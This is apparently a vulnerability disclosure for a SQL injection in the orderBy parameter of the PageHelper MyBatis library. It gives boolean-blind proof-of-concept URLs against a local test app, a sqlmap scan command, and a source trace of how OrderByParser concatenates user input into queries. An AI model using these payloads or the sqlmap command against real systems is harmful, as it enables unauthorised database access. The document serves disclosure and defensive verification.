Pagehelper has a SQL injection vulnerability validation process
Pagehelper has a SQL injection vulnerability validation process
Note: A Boolean blind and time blind SQL injection vulnerability exists in the orderBy parameter of pegehelper
Official website: https://pagehelper.github.io/
Source code: https://github.com/pagehelper/Mybatis-PageHelper
Git:https://github.com/pagehelper/Mybatis-PageHelper.git
Verification Process:
1. Local environment: SpringBoot+MyBatis+Maven+MySQL
2. Visit the page with the sort parameter orderBy
3. Visit URL:http://127.0.0.1:8080/testBook/testPageHelper1?pageNum=1&pageSize=10&orderBy=(SELECT (CASE WHEN (1=1)THEN 'costprice' ELSE (SELECT 1 UNION SELECT 2) END))
4. Visit URL:http://127.0.0.1:8080/testBook/testPageHelper1?pageNum=1&pageSize=10&orderBy=(SELECT (CASE WHEN (1=2)THEN 'costprice' ELSE (SELECT 1 UNION SELECT 2) END))
5. Scan using sqlmap, command:python3 sqlmap.py -u "http://127.0.0.1:8080/testBook/testPageHelper1?pageNum=1&pageSize=10&orderBy=costprice*" --batch --dbms=mysql
View the source code:
1. In the converToOrderBySql function of \com\github\pagehelper\parser\OrderByParser.java, stitch the SQL statements of the mapper with pageNum, pageSize, and orderBy
2. The function directly stitches the mapper SQL statement [select * from book] with the value submitted by the orderBy parameter [(SELECT (CASE WHEN (1=1) THEN 'costprice' ELSE (SELECT 1 UNION SELECT 2) END))]
3. The value returned by converToOrderBySql is assigned to sql, sql=SELECT * FROM book order by (SELECT (CASE WHEN (1=1) THEN 'costprice' ELSE (SELECT 1 UNION SELECT 2) END))
4. GetPageSql then stitches sql and LIMIT into the final query statement
5. In MySQL, you can view the history of executed SQL statements, and you can see that the parameters submitted by the orderBy parameter are completely put into the SQL statement of the query[ SELECT * FROM book order by (SELECT (CASE WHEN (1=2) THEN 'costprice' ELSE (SELECT 1 UNION SELECT 2) END)) LIMIT 10 ]
